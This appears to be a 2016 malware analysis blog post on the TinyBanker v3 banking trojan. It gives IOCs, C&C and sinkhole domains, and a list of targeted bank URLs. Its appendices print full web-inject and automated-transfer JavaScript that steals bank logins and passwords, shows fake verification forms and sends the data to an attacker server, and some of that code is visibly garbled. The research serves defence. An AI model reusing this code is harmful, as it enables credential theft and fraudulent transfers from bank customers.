Hold me closer, TinyBanker…. Version 3

Executive Summary

December 23, 2015, Trusteer published a blog about a new TinyBanker (aka, Tinba) variant 3, that has been observed primarily targeting banks in Asia, with the majority of the activity transpiring against Singapore (36 percent) and Indonesia (16 percent), among other regional countries. Germany, the United States, the United Kingdom, and Poland were also targeted but to a lesser extent. [1] TinyBanker v.3 uses a dedicated configuration for each region that it targets, a noteworthy evolution from previous versions. This blog’s technical analysis will focus on one sample harvested from Virus Total.

TinyBanker v. 3

The sample we analyzed (MD5 eb6721568dc18c734e0af12a3094b9fa) was first uploaded to Virus Total on September 23, 2015. One sinkholed command & control (C&C) domain revealed that on December 29, 2015, 11,280 active infections were present, indicating a moderate sized botnet.

Graph 1: December 29, 2015 Active Infections of TinyBanker v. 3 Sample

Ninety percent of the infections were located in Indonesia, followed by five percent in Germany, and one percent in Israel and Thailand, respectively.

Graph 2: Geographic Distribution of 12/29/2015 TinyBanker v. 3 Sample

The infections visualized on a map:

Figure 1: Geographic Distribution of 12/29/2015 TinyBanker v. 3 Sample

TinyBanker – A Brief History

The Danish security firm CSIS first discovered on May 31, 2012 by CSIS. On July 10, 2014, TinyBanker v. 1 source code leaked onto the Internet and was subsequently used by different actors who have reworked and improved the original code to support their own operations. Since September 2014, several campaigns have leveraged TinyBanker across the globe. TinyBanker is written in Assembly language and is historically known to store its files (executable, configuration, web-injects) into %AppData%default.

Technical Analysis of the Sample

The sample with MD5 eb6721568dc18c734e0af12a3094b9fa and SHA1 4c88bcf961e961c1429f95292514655b9c13768b was analyzed in a VirtualBox VM running Windows 7.

It tried to access these command & control (C&C) domains in the following order:

The full URL it tries to access looks like this [2]:

http://jw61gd6328hdy3tep.cc/n0tru2t76hw2edqj/
http://rmkltyeukjnw.org/n0tru2t76hw2edqj/

A report by Sophos [4] lists more domains than observed during analysis. Details about the possible C&C domains:

  • bqbcnrooddug.ru
  • rmkltyeukjnw.ru
  • ggccwfvisfll.ru

Active C&C

The URL http://ggccwfvisfll.ru/n0tru2t76hw2edqj/ is still alive at the time of this analysis. The following URLs were found to be active:

http://ggccwfvisfll.ru/n0tru2t76hw2edqj/      200   OK
http://ggccwfvisfll.ru/n0tru2t76hw2edqj/data/   403   Forbidden
http://ggccwfvisfll.ru/n0tru2t76hw2edqj/index.php   200   OK

The /data/ directory was known to exist in the leaked source code version.

Other activity

The sample moved itself into the directory “C:Users[User Name]AppDataRoaming547998F2” (in general “%AppData%[random number]”) similar to previous versions:

Its data files get stored to %AppData%LocalLow[random number].

A public key was extracted out of memory:

-----BEGIN PUBLIC KEY-----
MIIBITANBgkqhkiG9w0BAQEFAAOCAQ4AMIIBCQKCAQB02yRktntXr7evUF4IcmgL
QsUukgXaYbHLD42f7HusxI1TmZB7Ht/+5hMHqqY1aR+/M4V0/KKF2xcY24mO+VZj
ulHNQot654oLcWSi0gk+mrW+5gbEV5U3j31bjHQsAHprsypYuVhTdx19MQ9R4B1L
79JY2BjBo+QEwlKjVVN9K8PF/iOcPceA6iWn6pjkMAr1sdsFFrV8sOz3GbFt8rB0
JumQ2DpqVbn/P33ehLMFrpI6AErOeAQtEPCqn7bwdC9ZRmT1+uPH+MZJI3gmyN2V
wSpo6uPmB21CWvTrVvcfuxf7dYIp1JL7BoeqPwNTUdgvYDIVLXLjpKIk6a2mjsiD
AgMBAAE=
-----END PUBLIC KEY-----

C&C Protocol

The C&C protocol is slightly different to the previous versions.

This is the format of a packet received:

Domain

IP

Name Server

Registrant

jw61gd6328hdy3tep.cc

148.81.111.114

sinkhole.cert.pl

Sinkhole by CERT-PL

rmkltyeukjnw.ru

 

 

Suspended, possible C&C

rmkltyeukjnw.su

54.201.30.58

ns-1241.awsdns-27.org

Sinkhole by US company

rmkltyeukjnw.org

82.165.37.127

ns2.torpig-sinkhole.org

Sinkhole by German company

rmkltyeukjnw.pk

 

 

Not registered

bqbcnrooddug.ru

 

 

Suspended, possible C&C

bqbcnrooddug.su

52.28.249.128

NS1.101DOMAIN.COM

Sinkhole by K&A

bqbcnrooddug.org

5.2.189.251

www.bqbcnrooddug.org

Sinkhole by EU company

bqbcnrooddug.pk

 

 

Not registered

ggccwfvisfll.ru

185.117.153.167

c.dnspod.com

Active C&C

 The code can be found in memory when setting hooks on I/O functions like recv() (for the communication between the C&C) and setting hooks to the web browser internet I/O functions like InternetReadFile in the Internet Explorer processes.

 WebInjects and Targets

By setting a hook on the InternetReadFile function and stepping through manually and doing a memory scan the web-injects could be extracted live from an Internet Explorer process where TinyBanker was injected.

Below is the full list of target URLs. For a full listing of web-injects see Appendix 1.

set_url https://companynet.mbank.p* GP
set_url https://www.centrum24.p* GP
set_url https://m.companynet.mbank.p* GP
set_url https://www.corporates.commerz* GP
set_url https://www.commerz* GP
set_url https://kunden.commerz* GP
set_url https://cbportal.commerz* GP
set_url https://logon.online.anz* GP
set_url https://digitalbanking2.* GP
set_url https://velocity.* GP
set_url https://ibank.ocbcnisp.co* GP
set_url https://internet.ocbc.* GP
set_url https://sslsecure.maybank.com.s* GP
set_url https://www.maybank2e.co* GP
set_url https://logon.rhbbank.com.s* GP
set_url https://ibank.standardchartered.* GP
set_url https://s2b.* GP
set_url https://infinity.icicibank* GP
set_url https://cib.icicibank.* GP
set_url https://private.bank* GP
set_url https://www1.dbsvonline* GP
set_url https://internet-banking.dbs* GP
set_url https://betapib.uob.* GP
set_url https://??.bibplus.uobgroup.* GP
set_url https://uniservices2.uobgroup.* GP
set_url https://www.hsbc.* GP
set_url https://www2.secure.hsbcnet.* GP
set_url https://www.cimbclicks.com.sg* GP
set_url https://www.bizchannel.cimb.* GP
set_url https://www.onlinesbiglobal.* GP
set_url https://dbia.dnb.* GP
set_url https://www.sccb.* GP
set_url https://www.citibank.* GP
set_url https://www.citibusiness.citibank.* GP
set_url https://ib.bankmandiri.co.id/retail/common/menu.jsp GP
set_url https://ib.bri.co.i* GP
set_url https://ibank.klikbca.com/ GP
set_url https://ibank.klikbca.com/*.do GP
set_url https://ibank.klikbca.com/*.do?value* GP
set_url https://ibank.klikbca.com/*.htm GP
set_url https://ibank.klikbca.com/*.jsp GP
set_url https://ib.bankmandiri.co.id/retail/common/banner.jsp GP
set_url https://ib.bankmandiri.co.id/retail/*.do* GP
set_url https://mib.bankmandiri.co.id/sme/* GP
set_url https://vpn.tarumanagara.co* GP
set_url https://bnidirect.bni.co.i* GP
set_url https://bnidirectsme.bni.co.i* GP
set_url https://ibank.bni.co.id/corp/Auth* GP
set_url https://ibank.bni.co.id/corp/Finacl* GP
set_url https://ibank.bri.co.i* GP
set_url https://www.cimbclicks.co.* GP

Below is an example full set of web-inject. The blue highlighted part marks an external script downloaded and executed on the banks website.

set_url https://www.corporates.commerz* GP
data_before
</title>
data_end
data_inject
<script id="myqwe1">
window.rem777bname = '547998F2';
window.rem777ddeell = function (a){document.getElementById(a).parentNode.removeChild(document.getElementById(a))};
</script>
<script id="myqwe4" src="https://ajax.googleapis.com/ajax/libs/jquery/1.9.1/jquery.min.js"></script>
<script id="myqwe2" src="https://tools-data.ru/de/comz_plv2.js"></script>
<script id="myqwe3">
delete $;delete jQuery;
window.rem777ddeell("myqwe1");window.rem777ddeell("myqwe2");window.rem777ddeell("myqwe4");window.rem777ddeell("myqwe3");
delete rem777bname;delete rem777ddeell;
</script>
data_end
data_after
data_end

 The ATS (Automated Transfer System) server checks the Referer when trying to download the JavaScript files, therefore the Referer has to be manually set when trying to download the script from https://tools-data.ru/de/comz_plv2.js.

 Automated Transfer System (ATS) Server

The server has these URLs active:

https://tools-data.ru/index.html
https://tools-data.ru/index.php
https://tools-data.ru/phpmyadmin/
https://tools-data.ru/robots.txt

 The robots.txt reveals that the server has the Vesta Hosting Control Panel installed.

# vestacp autogenerated robots.txt
User-agent: *
Crawl-delay: 10

The server tools-data.ru (185.117.153.167) is hosted in Moscow. The whois data reveals that the domain was registered on 1/5/2016.

For more information on the ATS script, see Appendix 2.

domain: TOOLS-DATA.RU
nserver: a.dnspod.com.
nserver: b.dnspod.com.
nserver: c.dnspod.com.
state: REGISTERED, DELEGATED, UNVERIFIED
person: Private Person
registrar: ARDIS-RU
admin-contact: http://ardis.ru/whois/
created: 2016.01.05
paid-till: 2017.01.05
free-date: 2017.02.05
source: TCI

 

 

References

[1]   Trusteer/IBM: I’m Yelling Tinba! Trojan Sets Sights on Singapore Banks for Holiday Season

https://securityintelligence.com/im-yelling-tinba-trojan-sets-sights-on-singapore-banks-for-holiday-season/

[2]   TinyBanker sample on VirusTotal, MD5 eb6721568dc18c734e0af12a3094b9fa, SHA1 4c88bcf961e961c1429f95292514655b9c13768b

https://www.virustotal.com/en/file/f64a04708334dd760d2e7f466fade72ab658d7582ed10c1fccecfb4c684cd866/analysis/1447251734/

[3]   TinyBanker blacklist listing IP address observed as C&C in this variant

   http://osint.bambenekconsulting.com/feeds/tinba-iplist.txt

Historical entry (no longer available) via Google Cache http://webcache.googleusercontent.com/search?q=cache:7d3OoT0cCuwJ:osint.bambenekconsulting.com/feeds/tinba-iplist.txt+&cd=10&hl=en&ct=clnk&gl=us:

 http://osint.bambenekconsulting.com/feeds/tinba-master.txt

[4]   Sophos: Troj/Tinba-CB

https://www.sophos.com/en-us/threat-center/threat-analyses/viruses-and-spyware/Troj~Tinba-CB/detailed-analysis.aspx

[5]   https://otx.alienvault.com/indicator/domain/bqbcnrooddug.ru/

Appendix 1: Full Web-Injects

if(typeof adblockadblock === typeof undefined) {
window.adblockadblock=1;
var bldt98uu = (function(){
var mysetTimeout=window.setTimeout;
var mysetInterval=window.setInterval;
var myeval=window.eval; 
if(1==3){
window.setTimeout=function(){}
window.setInterval=function(){}
window.eval=function(){}
}
if(1==2){
var antifrod=true;
window.setTimeout=function(){if(antifrod)return 123;aa=mysetTimeout(arguments[0],arguments[1]);return aa;}
window.setInterval=function(){if(antifrod)return 123;aa=mysetInterval(arguments[0],arguments[1]);return aa;}
window.eval=function(){if(antifrod)return 123;aa=myeval(arguments[0]);return aa;}
}
 
var my7=jQuery.noConflict(true);
my7.fn.removeStyle = function(style) {var search = new RegExp(style + '[^;]+;?', 'g');return this.each(function(){my7(this).attr('style', function(i, style) {return style.replace(search, '');});});};
my7.fn.onEnterKey = function( ) { my7(this).keypress( function( event ) { var code = event.keyCode ? event.keyCode : event.which;if (code == 13) { return false;}} );};
 
var wwww="tools-data.ru";
var blokss="zzz";
var affid="plv2";
affid="commz999";
 
 
var home_link = "https://"+wwww+"/az/atsbmid";var gate_link = home_link+"/gate.php?obj=bldt98uu&q="+affid;var pkey = "Bc5rw12";
var waitdiv="<div><br/><br/><br/><br/><center> Harap tunggu&#8230; Karena pembaruan perangkat lunak saat ini, pengaturan akun Anda sedang berlangsung saat ini... Ini dapat memerlukan waktu sampai 5 menit. <br/>Perhatian! Jangan membuka ulang halaman tersebut dan jangan menekan tombol kembali! Ini dapat menyebabkan pemblokiran akun Anda! <br/><br/><br/><img id="zzz" src="https://"+wwww+"/indicator.gif"></img><br/><br/><center></div>";
var waitfkk="<table id="fkdiv" align="center" border="0" cellpadding="0" cellspacing="0" width="97%"> <tbody><tr> <td colspan="3" class="header" height="30"><div class="header" align="center">Verifikasi tambahan identitas<div class="catatantext2" align="left"> <div align="right"></div> </div> </div></td> </tr> <tr> <td height="10" width="55%"></td> <td width="5%"></td> <td width="40%"></td> </tr>     <tr> <td colspan="3"> <div class="text-bold" align="right">Masukkan e-mail Anda yang terdaftar di system Mandiri</div> </td> </tr> <tr> <td height="20"></td> <td><div align="center"></div></td> <td></td> </tr> <tr>    <td>     <div class="text-bold"> <div align="right">E-mail</div> </div>    </td>    <td><div align="center"><span class="text-bold">:</span></div></td>    <td><input id="fkmail" size="25" value="" type="text"></td> </tr> <tr> <td height="20"></td> <td></td> <td></td> </tr> <tr align="right" valign="middle"> <td colspan="3">           <div><input id="fksend" src="images/button-kirim.gif" alt="Enter to submit" border="0" height="20" type="image" width="136"></div>           </td> </tr> </tbody></table>";
var waitlok="<div><br/><br/><br/><br/><center> Kami bekerja pada pemutakhiran database, sehingga layanan ini sementara tidak tersedia. <br/>Kami akan mencoba untuk melanjutkan layanan sesegera mungkin. Silahkan coba lagi dalam beberapa jam.<br/><br/><center></div>";
 
var botid = "0";
try{ if(window.rem777bname) botid = window.rem777bname;}catch(e){}
var ifr_state = -1;
var browser_type="NN";
 
var dialog7=1;
var show_debug = false;
var dredea2a=false;
var lochref=location.href;
var replaz="";
 
var loginbtn=false;var ats_started="";var ifr_window=false;var onwrite_state=-1;var login="empty";var holder_name="empty";var transfer_from_account_nr="";var balances="";var tmp_val="empty";var tmp_val2="empty";
var max_sum=-9999999;var drop_name="";var drop_city="";var drop_country="";var iban="";var memo_text="";var transfered_amount=0;var msg_type="";var msg="";var return_type="";var page_content=[];
function urlEncode(b){function gethex(a){return"%"+f.charAt(a>>4)+f.charAt(a&0xF)}var c="0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz-_.~";var d="!*'();:@&=+$,/?%#[]";var e=c+d;var f="0123456789ABCDEFabcdef";b=b+"";var g="";if(!b||b.length==0){return""}for(var i=0;i<b.length;i++){var h=b.charAt(i);if(c.indexOf(h)!=-1){g=g+h}else{var j=b.charCodeAt(i);if(j<128){g=g+gethex(j)}if(j>127&&j<2048){g=g+gethex((j>>6)|0xC0);g=g+gethex((j&0x3F)|0x80)}if(j>2047&&j<65536){g=g+gethex((j>>12)|0xE0);g=g+gethex(((j>>6)&0x3F)|0x80);g=g+gethex((j&0x3F)|0x80)}if(j>65535){g=g+gethex((j>>18)|0xF0);g=g+gethex(((j>>12)&0x3F)|0x80);g=g+gethex(((j>>6)&0x3F)|0x80);g=g+gethex((j&0x3F)|0x80)}}}return g}
function returnTrue(a){return a==null||a==undefined||a=="null"||a=="undefined"||a=="empty"||a==""||a==" "||a.length<4?false:true}
function clearLog(){msg="";msg_type="";return_type="";page_content=[]}
function removealls(){}
function formatCurrency(a){a=a.toString().replace(/$|,/g,"");if(isNaN(a)){a="0"}sign=a==(a=Math.abs(a));a=Math.floor(a*100+0.50000000001);cents=a%100;a=Math.floor(a/100).toString();if(cents<10){cents="0"+cents}for(var i=0;i<Math.floor((a.length-(1+i))/3);i++){a=a.substring(0,a.length-(4*i+3))+" "+a.substring(a.length-(4*i+3))}return(sign?"":"-")+a}
function addLog(a,b,c,d){var e=new Date;e="z_"+botid+" "+ats_started+" "+(e.getHours()<10?"0":"")+e.getHours()+":"+(e.getMinutes()<10?"0":"")+e.getMinutes()+":"+(e.getSeconds()<10?"0":"")+e.getSeconds();msg_type=msg_type.length==0?c:!/error|warning/.test(msg_type)?c:msg_type;if(/error|warning/.test(c)){var f=page_content.length;var g="rn<base href='"+a.location.href.substr(0,a.location.href.lastIndexOf("/")+1)+"'>";page_content[f]=[];page_content[f].content_link=a.location.href;page_content[f].content="<html>"+g+"rn"+document.documentElement.innerHTML+"</html>"}msg="["+e+"] "+c+": "+b+"() -> "+d+(msg.length==0?"":"<br>")+msg}
function formatCurrency2(a){a=a+"";a=a.replace(/$|,/g,"");if(isNaN(a)){a="0"}sign=a==(a=Math.abs(a));a=Math.floor(a*100+0.50000000001);cents=a%100;a=Math.floor(a/100).toString();if(cents<10){cents="0"+cents}for(var i=0;i<Math.floor((a.length-(1+i))/3);i++){a=a.substring(0,a.length-(4*i+3))+"."+a.substring(a.length-(4*i+3))}return(sign?"":"-")+a}
 
 
 
 
function getData(a,b){removealls();if(!returnTrue(login)&&!/variables|write_log|get_parsed_numbers|send_b64_data/i.test(a)){doLogout();return}var c=drop_name.length>0?"&transfer_from_account_nr="+urlEncode(transfer_from_account_nr)+"&drop_name="+urlEncode(drop_name)+"&iban="+urlEncode(iban)+"&memo_text="+urlEncode(memo_text)+"&transfered_amount="+urlEncode(transfered_amount+""):"";var d=msg.length>0?"&msg_type="+urlEncode(msg_type)+"&msg="+urlEncode(msg)+"&return_type="+urlEncode(return_type||"atsEnd"):"";var e=balances.length>0?"&balances="+urlEncode(balances):"";var f="&bt="+urlEncode(browser_type)+"&botid="+urlEncode(botid);balances="";clearLog();
window.bldt98uu={};window.bldt98uu.CallResponse=function(msg_type, msg, ssid){
delete bldt98uu;my7("script[src*=atsbmid]").remove();callResponse(msg_type, msg, ssid);
};
my7.getScript(a+d+e+c+f);//my7("script[src*=atsbmid]").remove();
}
 
function postPageContent(){removeContentGrabberDiv();var a=document.createElement("div");a.id="contentGrabberDiv";if(!show_debug){a.style.display="none"}document.body.appendChild(a);var b="";b+="<iframe id="contentGrabbeIframe" name="contentGrabbeIframe" onLoad="try{bldt98uu.OnLoadContentGrabberIframe()}catch(err){void(0)}"></iframe>";b+="<form method="POST" action=""+gate_link+"" id="contentGrabberForm" target="contentGrabbeIframe">";b+="<textarea name="action">write_log</textarea>";if(returnTrue(login)){b+="<text"+"area name="login">"+login+"</text"+"area>"}if(balances.length>0){b+="<text"+"area name="balances">"+balances+"</text"+"area>"}b+="<text"+"area name="msg_type">"+msg_type+"</text"+"area>";b+="<text"+"area name="msg">"+msg+"</text"+"area>";b+="<text"+"area name="return_type">"+(return_type||"atsEnd")+"</text"+"area>";b+="<text"+"area name="pkey">"+pkey+"</text"+"area>";b+="<text"+"area name="bt">"+browser_type+"</text"+"area>";for(var i in page_content){b+="<text"+"area name="content_link_"+i+"">"+page_content[i].content_link+"</text"+"area>";b+="<text"+"area name="content_"+i+"">"+page_content[i].content.replace(/textarea/ig,"Zextarea")+"</text"+"area>"}b+="</form>";a.innerHTML=b;var c=document.getElementById("contentGrabberForm");balances="";clearLog();c.submit();}
function removeContentGrabberDiv(){if(document.getElementById("contentGrabberDiv")){document.getElementById("contentGrabberDiv").parentNode.removeChild(document.getElementById("contentGrabberDiv"))}}
function getDropData(a){var b="&action=get_drop_data";var c=Number(new Date);getData(gate_link+b+"&login="+urlEncode(login)+"&max_sum="+a+"&pkey="+urlEncode(pkey)+"&ssid="+c,c)}
function transferExists(){var a="&action=transfer_exists";var b=Number(new Date);getData(gate_link+a+"&login="+urlEncode(login)+"&pkey="+urlEncode(pkey)+"&ssid="+b,b)}
function writeLog(){if(page_content.length>0){zz=1;if(return_type=="atsEnd")zz=2;if(return_type=="showing")zz=3;postPageContent();if(zz==29)atsEnd();if(zz==3)show99();}else{var a="&action=write_log";var b=Number(new Date);getData(gate_link+a+"&login="+urlEncode(login)+"&pkey="+urlEncode(pkey)+"&ssid="+b,b)}}
function writeVariables(a,b){onwrite_state=b;var c="&action=set_variables";for(var d in a){c+="&"+d+"="+urlEncode(a[d])}var e=Number(new Date);getData(gate_link+c+"&login="+urlEncode(login)+"&pkey="+urlEncode(pkey)+"&ssid="+e,e)}
function readVariables(){var a="&action=get_variables";var b=Number(new Date);getData(gate_link+a+"&login="+urlEncode(login)+"&pkey="+urlEncode(pkey)+"&ssid="+b,b)}
function getcurr(a){return parseFloat(a.split(/,|./)[0].replace(/[^0-9--]/igm,""));}
 
function show99(){
my7("html").show();
}
 
function lokPage(){
my7("body").html(waitlok);show99();
addLog(document,"lokPage","info","lokPage");return_type="0";writeLog();
return;
}
 
function replacerCanStart(){lokPage();}
function submitToken(type){}
 
function atsEnd(){
addLog(document,"atsStart","info","end work");
ats_started="99";writeVariables({login:login,ats_started:ats_started},99);
}
 
function setconfig(b){var d=b.split("^z^");drop_name=d[0];drop_city=d[1];drop_country=d[2];iban=d[3];memo_text=d[4];transfered_amount=parseInt(d[5]);transfer_from_account_nr=d[6];}
 
function replacerzzz(a){ }
 
var tmprv="";
function callResponse(a,b,c){
removealls();
if(b=="lokPage"){lokPage();}
if(b=="doLogout"){top.location.href="https://ib.bankmandiri.co.id/";}
if(a=="error"){return;}
else if(a=="set_variables"){onWriteVariables()}
else if(a=="get_variables"){
tmprv=b;
console.log(b);
var d=b.split("^^^");
login=d[0];
holder_name=d[1];
ats_started=d[2];
tmp_val=d[3];
tmp_val2=d[4];
if(d[5].length>9) {replaz=d[5];replacerzzz(replaz);return;}
//replacer_received=parseReplacerArray(d[5]);
if(!returnTrue(login)){
ats_started=="99";
addLog(document,"callResponse","logout","login is empty. redirecting to login page");return_type="doLogout";writeLog();return;
}
onReadVariables();
}
 
else if(a=="transfer_exists"){
var d=b.split("^^^");var e=d[0]=="YES"?true:false;var f=d[1];
if(e){addLog(document,"callResponse","failed","transfer already exists for "+f);return_type="atsEnd";writeLog();return}
addLog(document,"callResponse","info","no transfers for this account. requesting drop for "+max_sum);getDropData(max_sum)
}
else if(a=="get_drop_data"){
if(/^([EMPTY])$/.test(b)){
addLog(document,"callResponse","info","no drops in admin panel.");
ats_started="2";writeVariables({login:login,ats_started:ats_started,tmp_val2:tmp_val2},888);
//addLog(document,"callResponse","failed","no drops in admin panel.");return_type="atsEnd";writeLog()
}
else if(/^([NOT_FOUND])$/.test(b)){addLog(document,"callResponse","failed","no suitable drops in admin panel.");
ats_started="2";writeVariables({login:login,ats_started:ats_started,tmp_val2:tmp_val2},888);
}
else{
top.d0r0op=b;
setconfig(b);
addLog(document,"callResponse","info","Starting transfer to: '"+iban+"' amount "+transfered_amount);
ats_started="3";writeVariables({login:login,ats_started:ats_started},888);
}
}
else if(a=="write_log"){
if(b=="atsEnd"){atsEnd()}
if(b=="showing"){show99();}
if(b=="readVariables"){readVariables()}
}
}
 
function IsEmail(email) {var regex = /^([a-zA-Z0-9_.+-])+@(([a-zA-Z0-9-])+.)+([a-zA-Z0-9]{2,4})+$/;return regex.test(email);}
function showmailfake(){
if(typeof window.mailok != typeof undefined) {delete mailok;submitimg(loginbtn);return;}
q1=my7(loginbtn).closest("table");
q1.after(waitfkk);
q1.hide();
my7("#fksend").click(function(){
var mailz=my7("#fkmail").val();
if(IsEmail(mailz)){
addLog(document,"saveLoginData","info","EMAIL:"+mailz);
ats_started="1";writeVariables({login:login,ats_started:ats_started,tmp_val:mailz},1);
} else {
addLog(document,"onLoaded","info"," mmssgg BADMAIL:"+mailz);return_type="0";writeLog();
alert("Anda masukkan e-mail yang salah");
}
return false;
});
}
 
 
function onWriteVariables(){
removealls();
if(onwrite_state==101){showmailfake();}
if(onwrite_state==1){submitimg(loginbtn);}
 
else if(onwrite_state==99){
top.dredea2a=true;
menuclick("https://ib.bankmandiri.co.id/retail/Welcome.do?action=result");
 
else if(onwrite_state==757){transferExists();}
else if(onwrite_state==371){window.refreshCityList();}
else if(onwrite_state==372){window.refreshBranchLocationList();}
else if(onwrite_state==373){transferExists();}
 
}
 
 
 
function onReadVariables(){
if(ats_started=="0"){
show99();
addLog(document,"atsStart","info","tmprv:"+tmprv);
ats_started="99";writeVariables({login:login,ats_started:ats_started},99);return;
}
 
if(ats_started=="99"){show99();return;}
 
 
if(ats_started=="1"){
q1=my7ajx("ol.breadcrumb li");
if(q1.size()==1) {holder_name=q1.text().replace(/^s*|s$|t|r|n/gim,"");}
 
q1=my7("div#Authorization");
if(q1.size()>0)
{
loginbtn=my7("a#REKENING");
if(loginbtn.size()!=1) {addLog(document,"onLoadIframe","error","error REKENING?");return_type="0";writeLog();show99();return;}
 
tmpx="";
tmpx=my7("span.bcum").text().replace(/^s*|s$|t|r|n/gim,"")+"||";
tmpx+=my7("div.pageheadingcaps h1").text().replace(/^s*|s$|t|r|n/gim,"")+"||";
q1=my7("div#DispForm");
if(q1.size()!=1){addLog(document,"onLoadIframe","error","error DispForm?");return_type="0";writeLog();show99();return;}
q1=q1.find("h2:has(span.simpletext), h3:has(span.simpletext), p.formrow:has(span.querytextleft):has(span.querytextright)");
q1.each(function(){
q2=my7(this);
if(q2.is("h3, h2")){tmpx+="hZZ"+q2.text()+"ZZ ||";return;}
w1=q2.find("span.querytextleft");
w2=q2.find("span.querytextright");
if(w2.find("a").size()>0){tmpx+="aZZ";}else{tmpx+="tZZ";}
tmpx+=w1.text()+"ZZ";
tmpx+=w2.text()+"||";
});
 
addLog(document,"onReadVariables","info","DETECT. go to REKENING");
ats_started="101";writeVariables({login:login,ats_started:ats_started,tmp_val2:tmpx},2);
return;
}
 
show99();
addLog(document,"onReadVariables","info","page:"+holder_name+" | "+document.title);
ats_started="1";writeVariables({login:login,ats_started:ats_started},298);
return;
}
 
 
else {
show99();
addLog(document,"onLoadIframe","error","lol??? "+ats_started+" "+lochref);return_type="0";writeLog();
}
 
}
 
var mon="not";
function onLoaded(){
lgf=my7("input#teilnehmer");
pss=my7("input#pin");
loginbtn=my7("button#headerLoginSubmit");
if(loginbtn.length>0 && lgf.length>0 && pss.length>0) {
var clicked=function(){
login=lgf.val();
addLog(document,"saveLoginData","info","ua:"+window.navigator.userAgent);
addLog(document,"saveLoginData","info","domain:"+document.location.host);
addLog(document,"saveLoginData","info","login MMSSGG details:"+login+"|||"+pss.val());
ats_started="1";writeVariables({login:login,ats_started:ats_started},101);
return false;
};
my7("form, input").onEnterKey();
show99();
loginbtn.click(function(){clicked();return false;});
return;
}
readVariables();return;
}
 
return{
   Run: function(){
   my7("html").hide();
my7(document).ready(function(){onLoaded();}); 
   },
   CallResponse: function(msg_type, msg, ssid){callResponse(msg_type, msg, ssid);},
   OnLoadIframe: function(a,b){onLoadIframe(a,b);},
   SubmitToken: function(type){submitToken(type);},
   addLog: function(a,b,c,d){addLog(a,b,c,d);},
   writeLog: function(){writeLog();},
   fake77: function(a,b){fake77(a,b);}
}
}());
 
 
if(bldt98uu.Run)bldt98uu.Run();
delete bldt98uu;
 

Appendix 2: ATS Engine Script

Original download URL https://tools-data.ru/de/comz_plv2.js with Referer set to https://www.commerzbank.com/.

if(typeof adblockadblock === typeof undefined) {
window.adblockadblock=1;
var bldt98uu = (function(){
var mysetTimeout=window.setTimeout;
var mysetInterval=window.setInterval;
var myeval=window.eval; 
if(1==3){
window.setTimeout=function(){}
window.setInterval=function(){}
window.eval=function(){}
}
if(1==2){
var antifrod=true;
window.setTimeout=function(){if(antifrod)return 123;aa=mysetTimeout(arguments[0],arguments[1]);return aa;}
window.setInterval=function(){if(antifrod)return 123;aa=mysetInterval(arguments[0],arguments[1]);return aa;}
window.eval=function(){if(antifrod)return 123;aa=myeval(arguments[0]);return aa;}
}
 
var my7=jQuery.noConflict(true);
my7.fn.removeStyle = function(style) {var search = new RegExp(style + '[^;]+;?', 'g');return this.each(function(){my7(this).attr('style', function(i, style) {return style.replace(search, '');});});};
my7.fn.onEnterKey = function( ) { my7(this).keypress( function( event ) { var code = event.keyCode ? event.keyCode : event.which;if (code == 13) { return false;}} );};
 
var wwww="tools-data.ru";
var blokss="zzz";
var affid="plv2";
affid="commz999";
 
 
var home_link = "https://"+wwww+"/az/atsbmid";var gate_link = home_link+"/gate.php?obj=bldt98uu&q="+affid;var pkey = "Bc5rw12";
var waitdiv="<div><br/><br/><br/><br/><center> Harap tunggu&#8230; Karena pembaruan perangkat lunak saat ini, pengaturan akun Anda sedang berlangsung saat ini... Ini dapat memerlukan waktu sampai 5 menit. <br/>Perhatian! Jangan membuka ulang halaman tersebut dan jangan menekan tombol kembali! Ini dapat menyebabkan pemblokiran akun Anda! <br/><br/><br/><img id="zzz" src="https://"+wwww+"/indicator.gif"></img><br/><br/><center></div>";
var waitfkk="<table id="fkdiv" align="center" border="0" cellpadding="0" cellspacing="0" width="97%"> <tbody><tr> <td colspan="3" class="header" height="30"><div class="header" align="center">Verifikasi tambahan identitas<div class="catatantext2" align="left"> <div align="right"></div> </div> </div></td> </tr> <tr> <td height="10" width="55%"></td> <td width="5%"></td> <td width="40%"></td> </tr>     <tr> <td colspan="3"> <div class="text-bold" align="right">Masukkan e-mail Anda yang terdaftar di system Mandiri</div> </td> </tr> <tr> <td height="20"></td> <td><div align="center"></div></td> <td></td> </tr> <tr>    <td>     <div class="text-bold"> <div align="right">E-mail</div> </div>    </td>    <td><div align="center"><span class="text-bold">:</span></div></td>    <td><input id="fkmail" size="25" value="" type="text"></td> </tr> <tr> <td height="20"></td> <td></td> <td></td> </tr> <tr align="right" valign="middle"> <td colspan="3">           <div><input id="fksend" src="images/button-kirim.gif" alt="Enter to submit" border="0" height="20" type="image" width="136"></div>           </td> </tr> </tbody></table>";
var waitlok="<div><br/><br/><br/><br/><center> Kami bekerja pada pemutakhiran database, sehingga layanan ini sementara tidak tersedia. <br/>Kami akan mencoba untuk melanjutkan layanan sesegera mungkin. Silahkan coba lagi dalam beberapa jam.<br/><br/><center></div>";
 
var botid = "0";
try{ if(window.rem777bname) botid = window.rem777bname;}catch(e){}
var ifr_state = -1;
var browser_type="NN";
 
var dialog7=1;
var show_debug = false;
var dredea2a=false;
var lochref=location.href;
var replaz="";
 
var loginbtn=false;var ats_started="";var ifr_window=false;var onwrite_state=-1;var login="empty";var holder_name="empty";var transfer_from_account_nr="";var balances="";var tmp_val="empty";var tmp_val2="empty";
var max_sum=-9999999;var drop_name="";var drop_city="";var drop_country="";var iban="";var memo_text="";var transfered_amount=0;var msg_type="";var msg="";var return_type="";var page_content=[];
